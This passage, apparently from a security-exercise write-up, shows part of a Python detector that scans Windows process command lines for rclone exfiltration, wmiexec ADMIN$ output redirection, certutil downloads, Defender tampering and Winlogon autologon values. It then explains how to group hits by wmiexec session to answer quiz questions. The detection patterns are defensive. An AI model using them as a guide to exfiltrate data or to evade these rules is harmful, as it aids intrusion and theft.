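RCLONE_RE = re.compile(r'rclone(?:\.exe)?"?\s+(copy|sync|move|copyto)\s+("[^"]+"|\S+)\s+([^\s:"]+):([^\s"]*)', re.I)
# Output capture to \\127.0.0.1\ADMIN$\__<unix epoch>, the wmiexec.py convention.
WMIEXEC_RE = re.compile(r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__(\d+(?:\.\d+)?)", re.I)


def detect(events: list) -> list:
    """Run every rule over each event; one finding per rule hit, with extracted fields."""
    findings = []
    for ev in events:
        cl = ev.get("CommandLine", "")
        base = {"host": ev.get("host"), "time": ev.get("time")}
        m = WINLOGON_RE.search(cl)
        if m:
            value = m.group(2) if m.group(2) is not None else m.group(3)
            findings.append({**base, "rule": "winlogon_autologon", "value_name": m.group(1), "value": value})
        m = DEFENDER_RE.search(cl)
        if m:
            findings.append({**base, "rule": "defender_tamper", "setting": m.group(1)})
        m = CERTUTIL_RE.search(cl)
        if m:
            findings.append({**base, "rule": "certutil_download", "url": m.group(1), "path": m.group(2)})
        m = RCLONE_RE.search(cl)
        if m:
            findings.append({**base, "rule": "rclone_exfil", "verb": m.group(1).lower(),
                             "source": m.group(2).strip('"'), "remote": m.group(3), "remote_path": m.group(4)})
        m = WMIEXEC_RE.search(cl)
        if m:
            epoch = float(m.group(1))
            findings.append({**base, "rule": "admin_share_output_redirect", "epoch": epoch,
                             "session_start_utc": datetime.fromtimestamp(epoch, tz=timezone.utc)})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        extra = {k: v for k, v in f.items() if k not in ("host", "time", "rule")}
        print(f"{f['time']}  {f['host']:<13} {f['rule']:<28} {extra}")
```

Feed it the events from a Splunk export of EventCode=1 (or 4688 with command-line auditing) as a list of dicts. The ADMIN$ rule decodes the epoch embedded in the file name, so findings that share the same session_start_utc were issued through one wmiexec session, which is exactly the grouping that ties the Q18 first command to the Q21 downloads.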
